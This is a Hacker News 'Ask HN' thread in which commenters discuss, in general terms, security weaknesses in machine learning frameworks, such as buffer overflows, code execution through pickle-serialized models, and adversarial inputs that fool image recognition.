
Ask HN: Vulnerabilities in ML frameworks - rs86
Does anyone know of any vulnerabilities in machine learning frameworks, specially buffer overflows and arbitrary execution?
======
k4ch0w
Well, that's a really broad question in itself. It is possible in the future
some vulnerability will exist in the framework, a security researcher just
hasn't discovered it yet. If you're referring to a framework written in C/C++,
then yes a buffer overflow is possible. Hopefully though, modern day
protections such as ASLR, CFG, CFI, etc. protect you. I'll refer you to an old
classic
[http://insecure.org/stf/smashstack.html](http://insecure.org/stf/smashstack.html),
however it is very hard to do this attack today. Modern compilers are pretty
good at preventing developers from shooting themselves. <3 clang's memory
sanitizer.

Arbitrary execution is more possible IMO. The way a lot of ML models are
stored is by being a serialized file using a framework like pickle or Java's
serialization. Theoretically, you could add code into a precompiled model that
when someone loads would execute arbitrary code. This could be done using a
simple technique like a code cave seen here
[https://en.wikipedia.org/wiki/Code_cave](https://en.wikipedia.org/wiki/Code_cave).
I haven't had time to dig into this myself, but I honestly don't think it
would be hard.

I think in the next couple years you will see more vulnerabilities pop up in
these frameworks, but finding security vulnerabilities take time.

~~~
rs86
Yes, that's the kind of attack I'm interested in, because most deep learning
libraries are written in C++. I think model inference and estimation will be
deployed widely in mobile phones and desktops and maybe they'll be an
important attack vector since they do heavy computing with complex data
structures and memory allocation.

------
mgliwka
There is a new different kind of attacks, i.e. fooling it to recognize things
as something they aren't:

[https://media.ccc.de/v/34c3-8860-deep_learning_blindspots](https://media.ccc.de/v/34c3-8860-deep_learning_blindspots)

[https://medium.com/@ageitgey/machine-learning-is-fun-
part-8-...](https://medium.com/@ageitgey/machine-learning-is-fun-part-8-how-
to-intentionally-trick-neural-networks-b55da32b7196)

~~~
Tiki
People building automated vehicle algorithms must have their hands full, I
can't even begin to think how you'd wrangle the amount of noise that exists in
the real world. Then you have to imagine all the ways that a system can be
exploited in the ways that it's supposed to function. How does it handle a
road side advertisement with a stop sign? A cardboard cutout of a person next
to the side of the road? All the reflective materials and their individual
properties? I know a lot of it is radar related so it's not just image
processing, but I can imagine a lot of ways that could be fooled and go wrong
as well.

~~~
stevew20
See relevant XKCD: [https://xkcd.com/1958/](https://xkcd.com/1958/)

I believe that most ML applications are fool-able by attacks of the same type
as would fool a human doing the same task as the ML. The really big difference
is the scale of attack required to fool ML vs a human.

For example, let's consider ML processing of camera+lidar data, similar to
Google's self driving system, versus a cardboard cut-out of a puppy in the
road. A human could be fooled by a really elaborate cardboard cut-out, or one
viewed at a high speed. ML is likely to be fooled by a cut-out as well, but
the elaborateness required of the cut-out would likely be lower (people would
notice it doesn't look normal, while the ML has a much smaller dataset than
the average person, and hasn't focussed on cute furry puppies as much). The ML
would also likely be much better at dealing with high speeds than a human
would be, because we don't have built in lidars and our brains work order of
magnitudes slower; but taken to an extreme (ML can't complete processing in
time to identify fake), the ML would not be able to tell the difference.

There are certainly other ways to go about it, but I think this is the most
straight forward and general 'attack', in that false positives are unavoidable
in ML (and in humans).

------
joshumax
I don't know if this counts, since your question is rather vague, but I wrote
an article a while back about how Torch creates certain vulnerabilities on
local systems: [https://joshumax.github.io/general/2017/06/08/how-torch-
brok...](https://joshumax.github.io/general/2017/06/08/how-torch-broke-
ls.html)

------
ladberg
No, and if someone did, they would report it to the developers.

